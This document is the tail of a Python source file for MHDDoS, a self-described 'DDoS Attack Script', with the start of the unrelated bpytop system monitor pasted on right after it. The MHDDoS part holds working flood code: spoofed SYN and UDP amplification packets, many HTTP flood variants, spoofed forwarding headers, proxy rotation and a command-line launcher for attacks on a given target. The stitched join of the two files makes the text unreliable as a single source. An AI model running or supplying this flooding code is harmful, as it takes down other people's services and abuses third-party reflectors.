MCPE(self) -> None: global BYTES_SEND, REQUESTS_SENT payload = (b'\x61\x74\x6f\x6d\x20\x64\x61\x74\x61\x20\x6f\x6e\x74\x6f\x70\x20\x6d\x79\x20\x6f' b'\x77\x6e\x20\x61\x73\x73\x20\x61\x6d\x70\x2f\x74\x72\x69\x70\x68\x65\x6e\x74\x20' b'\x69\x73\x20\x6d\x79\x20\x64\x69\x63\x6b\x20\x61\x6e\x64\x20\x62\x61\x6c\x6c' b'\x73') with socket(AF_INET, SOCK_DGRAM) as s: while Tools.sendto(s, payload, self._target): continue Tools.safe_close(s) def _genrate_syn(self) -> bytes: ip: IP = IP() ip.set_ip_src(getMyIPAddress()) ip.set_ip_dst(self._target[0]) tcp: TCP = TCP() tcp.set_SYN() tcp.set_th_dport(self._target[1]) tcp.set_th_sport(randint(1, 65535)) ip.contains(tcp) return ip.get_packet() def _generate_amp(self): payloads = [] for ref in self._ref: ip: IP = IP() ip.set_ip_src(self._target[0]) ip.set_ip_dst(ref) ud: UDP = UDP() ud.set_uh_dport(self._amp_payload[1]) ud.set_uh_sport(self._target[1]) ud.contains(Data(self._amp_payload[0])) ip.contains(ud) payloads.append((ip.get_packet(), (ref, self._amp_payload[1]))) return payloads # noinspection PyBroadException,PyUnusedLocal class HttpFlood(Thread): _proxies: List[Proxy] = None _payload: str _defaultpayload: Any _req_type: str _useragents: List[str] _referers: List[str] _target: URL _method: str _rpc: int _synevent: Any SENT_FLOOD: Any def __init__(self, target: URL, host: str, method: str = "GET", rpc: int = 1, synevent: Event = None, useragents: Set[str] = None, referers: Set[str] = None, proxies: Set[Proxy] = None) -> None: Thread.__init__(self, daemon=True) self.SENT_FLOOD = None self._synevent = synevent self._rpc = rpc self._method = method self._target = target self._host = host self._raw_target = (self._host, (self._target.port or 80)) if not self._target.host[len(self._target.host) - 1].isdigit(): self._raw_target = (self._host, (self._target.port or 80)) if not referers: referers: List[str] = [ "https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=", ",https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer" "/sharer.php?u=", ",https://drive.google.com/viewerng/viewer?url=", ",https://www.google.com/translate?u=" ] self._referers = list(referers) if proxies: self._proxies = list(proxies) if not useragents: useragents: List[str] = [ 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 ' 'Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 ' 'Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 ' 'Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0' ] self._useragents = list(useragents) self._req_type = self.getMethodType(method) self._defaultpayload = "%s %s HTTP/%s\r\n" % (self._req_type, target.raw_path_qs, randchoice(['1.0', '1.1', '1.2'])) self._payload = (self._defaultpayload + 'Accept-Encoding: gzip, deflate, br\r\n' 'Accept-Language: en-US,en;q=0.9\r\n' 'Cache-Control: max-age=0\r\n' 'Connection: Keep-Alive\r\n' 'Sec-Fetch-Dest: document\r\n' 'Sec-Fetch-Mode: navigate\r\n' 'Sec-Fetch-Site: none\r\n' 'Sec-Fetch-User: ?1\r\n' 'Sec-Gpc: 1\r\n' 'Pragma: no-cache\r\n' 'Upgrade-Insecure-Requests: 1\r\n') def run(self) -> None: if self._synevent: self._synevent.wait() self.select(self._method) while self._synevent.is_set(): self.SENT_FLOOD() @property def SpoofIP(self) -> str: spoof: str = ProxyTools.Random.rand_ipv4() return ("X-Forwarded-Proto: Http\r\n" f"X-Forwarded-Host: {self._target.raw_host}, 1.1.1.1\r\n" f"Via: {spoof}\r\n" f"Client-IP: {spoof}\r\n" f'X-Forwarded-For: {spoof}\r\n' f'Real-IP: {spoof}\r\n') def generate_payload(self, other: str = None) -> bytes: return str.encode((self._payload + "Host: %s\r\n" % self._target.authority + self.randHeadercontent + (other if other else "") + "\r\n")) def open_connection(self) -> socket: if self._proxies: sock = randchoice(self._proxies).open_socket(AF_INET, SOCK_STREAM) else: sock = socket(AF_INET, SOCK_STREAM) sock.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1) sock.connect(self._raw_target) if self._target.scheme.lower() == "https": sock = ctx.wrap_socket(sock, server_hostname=self._target.host, server_side=False, do_handshake_on_connect=True, suppress_ragged_eofs=True) return sock @property def randHeadercontent(self) -> str: return (f"User-Agent: {randchoice(self._useragents)}\r\n" f"Referrer: {randchoice(self._referers)}{parse.quote(self._target.human_repr())}\r\n" + self.SpoofIP) @staticmethod def getMethodType(method: str) -> str: return "GET" if {method.upper()} & {"CFB", "CFBUAM", "GET", "COOKIE", "OVH", "EVEN", "DYN", "SLOW", "PPS", "APACHE", "BOT", } \ else "POST" if {method.upper()} & {"POST", "XMLRPC", "STRESS"} \ else "HEAD" if {method.upper()} & {"GSB", "HEAD"} \ else "REQUESTS" def POST(self) -> None: payload: bytes = self.generate_payload( ("Content-Length: 44\r\n" "X-Requested-With: XMLHttpRequest\r\n" "Content-Type: application/json\r\n\r\n" '{"data": %s}') % ProxyTools.Random.rand_str(32))[:-2] s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): Tools.send(s, payload) Tools.safe_close(s) def STRESS(self) -> None: payload: bytes = self.generate_payload( (f"Content-Length: 524\r\n" "X-Requested-With: XMLHttpRequest\r\n" "Content-Type: application/json\r\n\r\n" '{"data": %s}') % ProxyTools.Random.rand_str(512))[:-2] s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): Tools.send(s, payload) Tools.safe_close(s) def COOKIES(self) -> None: payload: bytes = self.generate_payload( "Cookie: _ga=GA%s;" " _gat=1;" " __cfduid=dc232334gwdsd23434542342342342475611928;" " %s=%s\r\n" % (randint(1000, 99999), ProxyTools.Random.rand_str(6), ProxyTools.Random.rand_str(32))) s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): Tools.send(s, payload) Tools.safe_close(s) def APACHE(self) -> None: payload: bytes = self.generate_payload( "Range: bytes=0-,%s" % ",".join("5-%d" % i for i in range(1, 1024))) s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): Tools.send(s, payload) Tools.safe_close(s) def XMLRPC(self) -> None: payload: bytes = self.generate_payload( ("Content-Length: 345\r\n" "X-Requested-With: XMLHttpRequest\r\n" "Content-Type: application/xml\r\n\r\n" "<?xml version='1.0' encoding='iso-8859-1'?>" "<methodCall><methodName>pingback.ping</methodName>" "<params><param><value><string>%s</string></value>" "</param><param><value><string>%s</string>" "</value></param></params></methodCall>") % (ProxyTools.Random.rand_str(64), ProxyTools.Random.rand_str(64)))[:-2] s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): Tools.send(s, payload) Tools.safe_close(s) def PPS(self) -> None: s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): Tools.send(s, self._defaultpayload) Tools.safe_close(s) def GET(self) -> None: payload: bytes = self.generate_payload() s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): Tools.send(s, payload) Tools.safe_close(s) def BOT(self) -> None: payload: bytes = self.generate_payload() p1, p2 = str.encode( "GET /robots.txt HTTP/1.1\r\n" "Host: %s\r\n" % self._target.raw_authority + "Connection: Keep-Alive\r\n" "Accept: text/plain,text/html,*/*\r\n" "User-Agent: %s\r\n" % randchoice(google_agents) + "Accept-Encoding: gzip,deflate,br\r\n\r\n"), str.encode( "GET /sitemap.xml HTTP/1.1\r\n" "Host: %s\r\n" % self._target.raw_authority + "Connection: Keep-Alive\r\n" "Accept: */*\r\n" "From: googlebot(at)googlebot.com\r\n" "User-Agent: %s\r\n" % randchoice(google_agents) + "Accept-Encoding: gzip,deflate,br\r\n" "If-None-Match: %s-%s\r\n" % (ProxyTools.Random.rand_str(9), ProxyTools.Random.rand_str(4)) + "If-Modified-Since: Sun, 26 Set 2099 06:00:00 GMT\r\n\r\n") s = None with suppress(Exception), self.open_connection() as s: Tools.send(s, p1) Tools.send(s, p2) for _ in range(self._rpc): Tools.send(s, payload) Tools.safe_close(s) def EVEN(self) -> None: payload: bytes = self.generate_payload() s = None with suppress(Exception), self.open_connection() as s: while Tools.send(s, payload) and s.recv(1): continue Tools.safe_close(s) def OVH(self) -> None: payload: bytes = self.generate_payload() s = None with suppress(Exception), self.open_connection() as s: for _ in range(min(self._rpc, 5)): Tools.send(s, payload) Tools.safe_close(s) def CFB(self): global REQUESTS_SENT, BYTES_SEND pro = None if self._proxies: pro = randchoice(self._proxies) s = None with suppress(Exception), create_scraper() as s: for _ in range(self._rpc): if pro: with s.get(self._target.human_repr(), proxies=pro.asRequest()) as res: REQUESTS_SENT += 1 BYTES_SEND += Tools.sizeOfRequest(res) continue with s.get(self._target.human_repr()) as res: REQUESTS_SENT += 1 BYTES_SEND += Tools.sizeOfRequest(res) Tools.safe_close(s) def CFBUAM(self): payload: bytes = self.generate_payload() s = None with suppress(Exception), self.open_connection() as s: Tools.send(s, payload) sleep(5.01) for _ in range(self._rpc): Tools.send(s, payload) Tools.safe_close(s) def AVB(self): payload: bytes = self.generate_payload() s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): sleep(max(self._rpc / 1000, 1)) Tools.send(s, payload) Tools.safe_close(s) def DGB(self): global REQUESTS_SENT, BYTES_SEND s = None with suppress(Exception), create_scraper() as s: for _ in range(min(self._rpc, 5)): sleep(min(self._rpc, 5) / 100) if self._proxies: pro = randchoice(self._proxies) with s.get(self._target.human_repr(), proxies=pro.asRequest()) as res: REQUESTS_SENT += 1 BYTES_SEND += Tools.sizeOfRequest(res) continue with s.get(self._target.human_repr()) as res: REQUESTS_SENT += 1 BYTES_SEND += Tools.sizeOfRequest(res) Tools.safe_close(s) def DYN(self): payload: str | bytes = str.encode(self._payload + "Host: %s.%s\r\n" % (ProxyTools.Random.rand_str(6), self._target.authority) + self.randHeadercontent + "\r\n") s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): Tools.send(s, payload) Tools.safe_close(s) def DOWNLOADER(self): payload: str | bytes = self.generate_payload() s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): Tools.send(s, payload) while 1: sleep(.01) data = s.recv(1) if not data: break Tools.send(s, b'0') Tools.safe_close(s) def BYPASS(self): global REQUESTS_SENT, BYTES_SEND pro = None if self._proxies: pro = randchoice(self._proxies) s = None with suppress(Exception), Session() as s: for _ in range(self._rpc): if pro: with s.get(self._target.human_repr(), proxies=pro.asRequest()) as res: REQUESTS_SENT += 1 BYTES_SEND += Tools.sizeOfRequest(res) continue with s.get(self._target.human_repr()) as res: REQUESTS_SENT += 1 BYTES_SEND += Tools.sizeOfRequest(res) Tools.safe_close(s) def GSB(self): payload = str.encode("%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type, self._target.raw_path_qs, ProxyTools.Random.rand_str(6)) + "Host: %s\r\n" % self._target.authority + self.randHeadercontent + 'Accept-Encoding: gzip, deflate, br\r\n' 'Accept-Language: en-US,en;q=0.9\r\n' 'Cache-Control: max-age=0\r\n' 'Connection: Keep-Alive\r\n' 'Sec-Fetch-Dest: document\r\n' 'Sec-Fetch-Mode: navigate\r\n' 'Sec-Fetch-Site: none\r\n' 'Sec-Fetch-User: ?1\r\n' 'Sec-Gpc: 1\r\n' 'Pragma: no-cache\r\n' 'Upgrade-Insecure-Requests: 1\r\n\r\n') s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): Tools.send(s, payload) Tools.safe_close(s) def NULL(self) -> None: payload: str | bytes = str.encode(self._payload + "Host: %s\r\n" % self._target.authority + "User-Agent: null\r\n" + "Referrer: null\r\n" + self.SpoofIP + "\r\n") s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): Tools.send(s, payload) Tools.safe_close(s) def BOMB(self): pro = randchoice(self._proxies) run([ f'{Path.home() / "go/bin/bombardier"}', f'{bombardier_path}', f'--connections={self._rpc}', '--http2', '--method=GET', '--no-print', '--timeout=5s', f'--requests={self._rpc}', f'--proxy={pro}', f'{self._target.human_repr()}', ]) def SLOW(self): payload: bytes = self.generate_payload() s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): Tools.send(s, payload) while Tools.send(s, payload) and s.recv(1): for i in range(self._rpc): keep = str.encode("X-a: %d\r\n" % randint(1, 5000)) Tools.send(s, keep) sleep(self._rpc / 15) break Tools.safe_close(s) def select(self, name: str) -> None: self.SENT_FLOOD = self.GET if name == "POST": self.SENT_FLOOD = self.POST if name == "CFB": self.SENT_FLOOD = self.CFB if name == "CFBUAM": self.SENT_FLOOD = self.CFBUAM if name == "XMLRPC": self.SENT_FLOOD = self.XMLRPC if name == "BOT": self.SENT_FLOOD = self.BOT if name == "APACHE": self.SENT_FLOOD = self.APACHE if name == "BYPASS": self.SENT_FLOOD = self.BYPASS if name == "OVH": self.SENT_FLOOD = self.OVH if name == "AVB": self.SENT_FLOOD = self.AVB if name == "STRESS": self.SENT_FLOOD = self.STRESS if name == "DYN": self.SENT_FLOOD = self.DYN if name == "SLOW": self.SENT_FLOOD = self.SLOW if name == "GSB": self.SENT_FLOOD = self.GSB if name == "NULL": self.SENT_FLOOD = self.NULL if name == "COOKIE": self.SENT_FLOOD = self.COOKIES if name == "PPS": self.SENT_FLOOD = self.PPS self._defaultpayload = ( self._defaultpayload + "Host: %s\r\n\r\n" % self._target.authority).encode() if name == "EVEN": self.SENT_FLOOD = self.EVEN if name == "DOWNLOADER": self.SENT_FLOOD = self.DOWNLOADER if name == "BOMB": self.SENT_FLOOD = self.BOMB class ProxyManager: @staticmethod def DownloadFromConfig(cf, Proxy_type: int) -> Set[Proxy]: providrs = [ provider for provider in cf["proxy-providers"] if provider["type"] == Proxy_type or Proxy_type == 0 ] logger.info("Downloading Proxies form %d Providers" % len(providrs)) proxes: Set[Proxy] = set() with ThreadPoolExecutor(len(providrs)) as executor: future_to_download = { executor.submit( ProxyManager.download, provider, ProxyType.stringToProxyType(str(provider["type"]))) for provider in providrs } for future in as_completed(future_to_download): for pro in future.result(): proxes.add(pro) return proxes @staticmethod def download(provider, proxy_type: ProxyType) -> Set[Proxy]: logger.debug( "Downloading Proxies form (URL: %s, Type: %s, Timeout: %d)" % (provider["url"], proxy_type.name, provider["timeout"])) proxes: Set[Proxy] = set() with suppress(TimeoutError, exceptions.ConnectionError, exceptions.ReadTimeout): data = get(provider["url"], timeout=provider["timeout"]).text try: for proxy in ProxyUtiles.parseAllIPPort( data.splitlines(), proxy_type): proxes.add(proxy) except Exception as e: logger.error('Download Proxy Error: %s' % (e.__str__() or e.__repr__())) return proxes class ToolsConsole: METHODS = {"INFO", "TSSRV", "CFIP", "DNS", "PING", "CHECK", "DSTAT"} @staticmethod def checkRawSocket(): with suppress(OSError): with socket(AF_INET, SOCK_RAW, IPPROTO_TCP): return True return False @staticmethod def runConsole(): cons = "%s@BetterStresser:~#" % gethostname() while 1: cmd = input(cons + " ").strip() if not cmd: continue if " " in cmd: cmd, args = cmd.split(" ", 1) cmd = cmd.upper() if cmd == "HELP": print("Tools:" + ", ".join(ToolsConsole.METHODS)) print("Commands: HELP, CLEAR, BACK, EXIT") continue if (cmd == "E") or \ (cmd == "EXIT") or \ (cmd == "Q") or \ (cmd == "QUIT") or \ (cmd == "LOGOUT") or \ (cmd == "CLOSE"): exit(-1) if cmd == "CLEAR": print("\033c") continue if not {cmd} & ToolsConsole.METHODS: print("%s command not found" % cmd) continue if cmd == "DSTAT": with suppress(KeyboardInterrupt): ld = net_io_counters(pernic=False) while True: sleep(1) od = ld ld = net_io_counters(pernic=False) t = [(last - now) for now, last in zip(od, ld)] logger.info( ("Bytes Sended %s\n" "Bytes Recived %s\n" "Packets Sended %s\n" "Packets Recived %s\n" "ErrIn %s\n" "ErrOut %s\n" "DropIn %s\n" "DropOut %s\n" "Cpu Usage %s\n" "Memory %s\n") % (Tools.humanbytes(t[0]), Tools.humanbytes(t[1]), Tools.humanformat(t[2]), Tools.humanformat(t[3]), t[4], t[5], t[6], t[7], str(cpu_percent()) + "%", str(virtual_memory().percent) + "%")) if cmd in ["CFIP", "DNS"]: print("Soon") continue if cmd == "CHECK": while True: with suppress(Exception): domain = input(f'{cons}give-me-ipaddress# ') if not domain: continue if domain.upper() == "BACK": break if domain.upper() == "CLEAR": print("\033c") continue if (domain.upper() == "E") or \ (domain.upper() == "EXIT") or \ (domain.upper() == "Q") or \ (domain.upper() == "QUIT") or \ (domain.upper() == "LOGOUT") or \ (domain.upper() == "CLOSE"): exit(-1) if "/" not in domain: continue logger.info("please wait ...") with get(domain, timeout=20) as r: logger.info(('status_code: %d\n' 'status: %s') % (r.status_code, "ONLINE" if r.status_code <= 500 else "OFFLINE")) if cmd == "INFO": while True: domain = input(f'{cons}give-me-ipaddress# ') if not domain: continue if domain.upper() == "BACK": break if domain.upper() == "CLEAR": print("\033c") continue if (domain.upper() == "E") or \ (domain.upper() == "EXIT") or \ (domain.upper() == "Q") or \ (domain.upper() == "QUIT") or \ (domain.upper() == "LOGOUT") or \ (domain.upper() == "CLOSE"): exit(-1) domain = domain.replace('https://', '').replace('http://', '') if "/" in domain: domain = domain.split("/")[0] print('please wait ...', end="\r") info = ToolsConsole.info(domain) if not info["success"]: print("Error!") continue logger.info(("Country: %s\n" "City: %s\n" "Org: %s\n" "Isp: %s\n" "Region: %s\n") % (info["country"], info["city"], info["org"], info["isp"], info["region"])) if cmd == "TSSRV": while True: domain = input(f'{cons}give-me-domain# ') if not domain: continue if domain.upper() == "BACK": break if domain.upper() == "CLEAR": print("\033c") continue if (domain.upper() == "E") or \ (domain.upper() == "EXIT") or \ (domain.upper() == "Q") or \ (domain.upper() == "QUIT") or \ (domain.upper() == "LOGOUT") or \ (domain.upper() == "CLOSE"): exit(-1) domain = domain.replace('https://', '').replace('http://', '') if "/" in domain: domain = domain.split("/")[0] print('please wait ...', end="\r") info = ToolsConsole.ts_srv(domain) logger.info("TCP: %s\n" % (info['_tsdns._tcp.'])) logger.info("UDP: %s\n" % (info['_ts3._udp.'])) if cmd == "PING": while True: domain = input(f'{cons}give-me-ipaddress# ') if not domain: continue if domain.upper() == "BACK": break if domain.upper() == "CLEAR": print("\033c") if (domain.upper() == "E") or \ (domain.upper() == "EXIT") or \ (domain.upper() == "Q") or \ (domain.upper() == "QUIT") or \ (domain.upper() == "LOGOUT") or \ (domain.upper() == "CLOSE"): exit(-1) domain = domain.replace('https://', '').replace('http://', '') if "/" in domain: domain = domain.split("/")[0] logger.info("please wait ...") r = ping(domain, count=5, interval=0.2) logger.info(('Address: %s\n' 'Ping: %d\n' 'Aceepted Packets: %d/%d\n' 'status: %s\n') % (r.address, r.avg_rtt, r.packets_received, r.packets_sent, "ONLINE" if r.is_alive else "OFFLINE")) @staticmethod def stop(): print('All Attacks has been Stopped !') for proc in process_iter(): if proc.name() == "python.exe": proc.kill() @staticmethod def usage(): print(( '* MHDDoS - DDoS Attack Script With %d Methods\n' 'Note: If the Proxy list is empty, the attack will run without proxies\n' ' If the Proxy file doesn\'t exist, the script will download proxies and check them.\n' ' Proxy Type 0 = All in config.json\n' ' SocksTypes:\n' ' - 6 = RANDOM\n' ' - 5 = SOCKS5\n' ' - 4 = SOCKS4\n' ' - 1 = HTTP\n' ' - 0 = ALL\n' ' > Methods:\n' ' - Layer4\n' ' | %s | %d Methods\n' ' - Layer7\n' ' | %s | %d Methods\n' ' - Tools\n' ' | %s | %d Methods\n' ' - Others\n' ' | %s | %d Methods\n' ' - All %d Methods\n' '\n' 'Example:\n' ' L7: python3 %s <method> <url> <socks_type> <threads> <proxylist> <rpc> <duration> <debug=optional>\n' ' L4: python3 %s <method> <ip:port> <threads> <duration>\n' ' L4 Proxied: python3 %s <method> <ip:port> <threads> <duration> <socks_type> <proxylist>\n' ' L4 Amplification: python3 %s <method> <ip:port> <threads> <duration> <reflector file (only use with' ' Amplification)>\n') % (len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS), ", ".join(Methods.LAYER4_METHODS), len(Methods.LAYER4_METHODS), ", ".join(Methods.LAYER7_METHODS), len(Methods.LAYER7_METHODS), ", ".join(ToolsConsole.METHODS), len(ToolsConsole.METHODS), ", ".join(["TOOLS", "HELP", "STOP"]), 3, len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS), argv[0], argv[0], argv[0], argv[0])) # noinspection PyBroadException @staticmethod def ts_srv(domain): records = ['_ts3._udp.', '_tsdns._tcp.'] DnsResolver = resolver.Resolver() DnsResolver.timeout = 1 DnsResolver.lifetime = 1 Info = {} for rec in records: try: srv_records = resolver.resolve(rec + domain, 'SRV') for srv in srv_records: Info[rec] = str(srv.target).rstrip('.') + ':' + str( srv.port) except: Info[rec] = 'Not found' return Info # noinspection PyUnreachableCode @staticmethod def info(domain): with suppress(Exception), get("https://ipwhois.app/json/%s/" % domain) as s: return s.json() return {"success": False} def handleProxyList(con, proxy_li, proxy_ty, url=None): if proxy_ty not in {4, 5, 1, 0, 6}: exit("Socks Type Not Found [4, 5, 1, 0, 6]") if proxy_ty == 6: proxy_ty = randchoice([4, 5, 1]) if not proxy_li.exists(): logger.warning("The file doesn't exist, creating files and downloading proxies.") proxy_li.parent.mkdir(parents=True, exist_ok=True) with proxy_li.open("w") as wr: Proxies: Set[Proxy] = ProxyManager.DownloadFromConfig(con, proxy_ty) logger.info( f"{len(Proxies):,} Proxies are getting checked, this may take awhile!" ) Proxies = ProxyChecker.checkAll( Proxies, timeout=1, threads=threads, url=url.human_repr() if url else "http://httpbin.org/get", ) if not Proxies: exit( "Proxy Check failed, Your network may be the problem" " | The target may not be available." ) stringBuilder = "" for proxy in Proxies: stringBuilder += (proxy.__str__() + "\n") wr.write(stringBuilder) proxies = ProxyUtiles.readFromFile(proxy_li) if proxies: logger.info(f"Proxy Count: {len(proxies):,}") else: logger.info( "Empty Proxy File, running flood witout proxy") proxies = None return proxies if __name__ == '__main__': with open(__dir__ / "config.json") as f: con = load(f) with suppress(KeyboardInterrupt): with suppress(IndexError): one = argv[1].upper() if one == "HELP": raise IndexError() if one == "TOOLS": ToolsConsole.runConsole() if one == "STOP": ToolsConsole.stop() method = one host = None url = None event = Event() event.clear() target = None urlraw = argv[2].strip() if not urlraw.startswith("http"): urlraw = "http://" + urlraw if method not in Methods.ALL_METHODS: exit("Method Not Found %s" % ", ".join(Methods.ALL_METHODS)) if method in Methods.LAYER7_METHODS: url = URL(urlraw) host = url.host try: host = gethostbyname(url.host) except Exception as e: exit('Cannot resolve hostname ', url.host, e) threads = int(argv[4]) rpc = int(argv[6]) timer = int(argv[7]) proxy_ty = int(argv[3].strip()) proxy_li = Path(__dir__ / "files/proxies/" / argv[5].strip()) useragent_li = Path(__dir__ / "files/useragent.txt") referers_li = Path(__dir__ / "files/referers.txt") bombardier_path = Path(__dir__ / "go/bin/bombardier") proxies: Any = set() if method == "BOMB": assert ( bombardier_path.exists() or bombardier_path.with_suffix('.exe').exists() ), ( "Install bombardier: " "https://github.com/MHProDev/MHDDoS/wiki/BOMB-method" ) if len(argv) == 9: logger.setLevel("DEBUG") if not useragent_li.exists(): exit("The Useragent file doesn't exist ") if not referers_li.exists(): exit("The Referer file doesn't exist ") uagents = set(a.strip() for a in useragent_li.open("r+").readlines()) referers = set(a.strip() for a in referers_li.open("r+").readlines()) if not uagents: exit("Empty Useragent File ") if not referers: exit("Empty Referer File ") if threads > 1000: logger.warning("Thread is higher than 1000") if rpc > 100: logger.warning( "RPC (Request Pre Connection) is higher than 100") proxies = handleProxyList(con, proxy_li, proxy_ty, url) for _ in range(threads): HttpFlood(url, host, method, rpc, event, uagents, referers, proxies).start() if method in Methods.LAYER4_METHODS: target = URL(urlraw) port = target.port target = target.host try: target = gethostbyname(target) except Exception as e: exit('Cannot resolve hostname ', url.host, e) if port > 65535 or port < 1: exit("Invalid Port [Min: 1 / Max: 65535] ") if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD", "SYN"} and \ not ToolsConsole.checkRawSocket(): exit("Cannot Create Raw Socket") threads = int(argv[3]) timer = int(argv[4]) proxies = None ref = None if not port: logger.warning("Port Not Selected, Set To Default: 80") port = 80 if len(argv) >= 6: argfive = argv[5].strip() if argfive: refl_li = Path(__dir__ / "files" / argfive) if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD"}: if not refl_li.exists(): exit("The reflector file doesn't exist") if len(argv) == 7: logger.setLevel("DEBUG") ref = set(a.strip() for a in ProxyTools.Patterns.IP.findall( refl_li.open("r+").read())) if not ref: exit("Empty Reflector File ") elif argfive.isdigit() and len(argv) >= 7: if len(argv) == 8: logger.setLevel("DEBUG") proxy_ty = int(argfive) proxy_li = Path(__dir__ / "files/proxies" / argv[6].strip()) proxies = handleProxyList(con, proxy_li, proxy_ty) if method not in {"MINECRAFT", "MCBOT", "TCP", "CPS", "CONNECTION"}: exit("this method cannot use for layer4 proxy") else: logger.setLevel("DEBUG") for _ in range(threads): Layer4((target, port), ref, method, event, proxies).start() logger.info( "Attack Started to %s with %s method for %s seconds, threads: %d!" % (target or url.human_repr(), method, timer, threads)) event.set() ts = time() while time() < ts + timer: logger.debug('PPS: %s, BPS: %s / %d%%' % (Tools.humanformat(int(REQUESTS_SENT)), Tools.humanbytes(int(BYTES_SEND)), round((time() - ts) / timer * 100, 2))) REQUESTS_SENT.set(0) BYTES_SEND.set(0) sleep(1) event.clear() exit() ToolsConsole.usage()
bpytop.py
#!/usr/bin/env python3 # pylint: disable=not-callable, no-member # indent = tab # tab-size = 4 # Copyright 2020 Aristocratos (jakob@qvantnet.com) # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os, sys, threading, signal, re, subprocess, logging, logging.handlers, argparse import urllib.request from time import time, sleep, strftime, localtime from datetime import timedelta from _thread import interrupt_main from collections import defaultdict from select import select from distutils.util import strtobool from string import Template from math import ceil, floor from random import randint from shutil import which from typing import List, Set, Dict, Tuple, Optional, Union, Any, Callable, ContextManager, Iterable, Type, NamedTuple errors: List[str] = [] try: import fcntl, termios, tty, pwd except Exception as e: errors.append(f'{e}') try: import psutil # type: ignore except Exception as e: errors.append(f'{e}') SELF_START = time() SYSTEM: str if "linux" in sys.platform: SYSTEM = "Linux" elif "bsd" in sys.platform: SYSTEM = "BSD" elif "darwin" in sys.platform: SYSTEM = "MacOS" else: SYSTEM = "Other" if errors: print("ERROR!") print("\n".join(errors)) if SYSTEM == "Other": print("\nUnsupported platform!\n") else: print("\nInstall required modules!\n") raise SystemExit(1) VERSION: str = "1.0.51" #? Argument parser -------------------------------------------------------------------------------> args = argparse.ArgumentParser() args.add_argument("-f" , "--full" ,action="store_true" ,help ="Start in full mode showing all boxes [default]") args.add_argument("-p" , "--proc" ,action="store_true" ,help ="Start in minimal mode without memory and net boxes") args.add_argument("-s" , "--stat" ,action="store_true" ,help ="Start in minimal mode without process box") args.add_argument("-v" , "--version" ,action="store_true" ,help ="Show version info and exit") args.add_argument("--debug" ,action="store_true" ,help ="Start with loglevel set to DEBUG overriding value set in config") stdargs = args.parse_args() if stdargs.version: print(f'bpytop version: {VERSION}\n' f'psutil version: {".".join(str(x) for x in psutil.version_info)}') raise SystemExit(0) ARG_MODE: str = "" if stdargs.full: ARG_MODE = "full" elif stdargs.proc: ARG_MODE = "proc" elif stdargs.stat: ARG_MODE = "stat" DEBUG = stdargs.debug #? Variables -------------------------------------------------------------------------------------> BANNER_SRC: List[Tuple[str, str, str]] = [ ("#ffa50a", "#0fd7ff", "██████╗ ██████╗ ██╗ ██╗████████╗ ██████╗ ██████╗"), ("#f09800", "#00bfe6", "██╔══██╗██╔══██╗╚██╗ ██╔╝╚══██╔══╝██╔═══██╗██╔══██╗"), ("#db8b00", "#00a6c7", "██████╔╝██████╔╝ ╚████╔╝ ██║ ██║ ██║██████╔╝"), ("#c27b00", "#008ca8", "██╔══██╗██╔═══╝ ╚██╔╝ ██║ ██║ ██║██╔═══╝ "), ("#a86b00", "#006e85", "██████╔╝██║ ██║ ██║ ╚██████╔╝██║"), ("#000000", "#000000", "╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝"), ] #*?This is the template used to create the config file DEFAULT_CONF: Template = Template(f'#? Config file for bpytop v. {VERSION}' + ''' #* Color theme, looks for a .theme file in "/usr/[local/]share/bpytop/themes" and "~/.config/bpytop/themes", "Default" for builtin default theme. #* Prefix name by a plus sign (+) for a theme located in user themes folder, i.e. color_theme="+monokai" color_theme="$color_theme" #* If the theme set background should be shown, set to False if you want terminal background transparency theme_background=$theme_background #* Set bpytop view mode, "full" for everything shown, "proc" for cpu stats and processes, "stat" for cpu, mem, disks and net stats shown. view_mode=$view_mode #* Update time in milliseconds, increases automatically if set below internal loops processing time, recommended 2000 ms or above for better sample times for graphs. update_ms=$update_ms #* Processes sorting, "pid" "program" "arguments" "threads" "user" "memory" "cpu lazy" "cpu responsive", #* "cpu lazy" updates top process over time, "cpu responsive" updates top process directly. proc_sorting="$proc_sorting" #* Reverse sorting order, True or False. proc_reversed=$proc_reversed #* Show processes as a tree proc_tree=$proc_tree #* Which depth the tree view should auto collapse processes at tree_depth=$tree_depth #* Use the cpu graph colors in the process list. proc_colors=$proc_colors #* Use a darkening gradient in the process list. proc_gradient=$proc_gradient #* If process 